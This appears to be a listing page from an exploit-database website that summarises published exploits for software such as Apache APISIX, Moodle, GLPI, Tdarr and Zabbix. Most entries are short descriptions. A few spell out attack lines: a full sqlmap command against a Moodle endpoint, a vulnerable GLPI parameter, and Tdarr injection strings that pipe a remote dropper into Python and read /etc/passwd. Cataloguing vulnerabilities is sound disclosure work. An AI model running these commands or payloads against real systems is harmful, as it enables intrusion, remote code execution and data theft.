header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Apache APISIX 2.12.1 – Remote Code Execution (RCE)

A vulnerability in Apache APISIX versions 1.3 - 2.12.1 allows an attacker to execute arbitrary code on the target system. This is due to the lack of proper input validation when handling user-supplied data. An attacker can exploit this vulnerability by sending a maliciously crafted request to the target system.

Tiny File Manager 2.4.6 – Remote Code Execution (RCE)

Tiny File Manager 2.4.6 is vulnerable to Remote Code Execution (RCE) due to a lack of authentication. An attacker can exploit this vulnerability by sending a malicious POST request to the vulnerable application. This will allow the attacker to execute arbitrary code on the server.

Moodle 3.11.5 – SQLi (Authenticated)

Moodle 2.7dev (Build: 20131129) to 3.11.5+ 2nd Order SQLi Exploit by muffin (@mufinnnnnnn). Exploit allows an authenticated user to inject malicious SQL code into the application. The exploit requires the user to define variables at the top of the tamper() function, create a file called req.txt, and run the tamper script with the command 'python sqlmap.py -u "http://127.0.0.1/moodle/badges/criteria_settings.php?badgeid=badge-id-replace-me&add=1&type=6" --tamper=moodle_2nd_order_sqli.py --data=@req.txt --level=5 --risk=3 --dbms=mysql --threads=10 --batch'

VIVE Runtime Service – ‘ViveAgentService’ Unquoted Service Path

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

Baixar GLPI Project 9.4.6 – SQLi

This exploit is related to the Baixar GLPI Project 9.4.6. It is a SQL injection vulnerability that allows an attacker to execute malicious SQL queries on the vulnerable system. The exploit is triggered by sending a specially crafted request to the plugins/ramo/ramoapirest.php/getOutdated?idu=-1 endpoint. The attacker can then use the sqlmap tool to enumerate the databases on the vulnerable system.

Tdarr 2.00.15 – Command Injection

The Help tab contains a terminal for both FFmpeg and HandBrake. These terminals do not include input filtering which allows the user to chain commands and spawn a reverse shell. eg. `--help; curl http://192.168.0.2/dropper.py | python` or `--help;whoami;cat /etc/passwd`. Tdarr is not protected by any auth by default and no credentials are required to trigger RCE.

Sony playmemories home – ‘PMBDeviceInfoProvider’ Unquoted Service Path

A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

Zabbix 5.0.17 – Remote Code Execution (RCE) (Authenticated)

This exploit is tested against Zabbix 5.0.17 only. It is a blind RCE exploit, so the results of the exploit will not be visible on the site. The exploit uses a Session object to authenticate the user and then adds an item with a system.run command to execute the code. The attacker IP and port are used as the trapper hosts. If the item name is found in the response text, the exploit is successful.

Recent Exploits: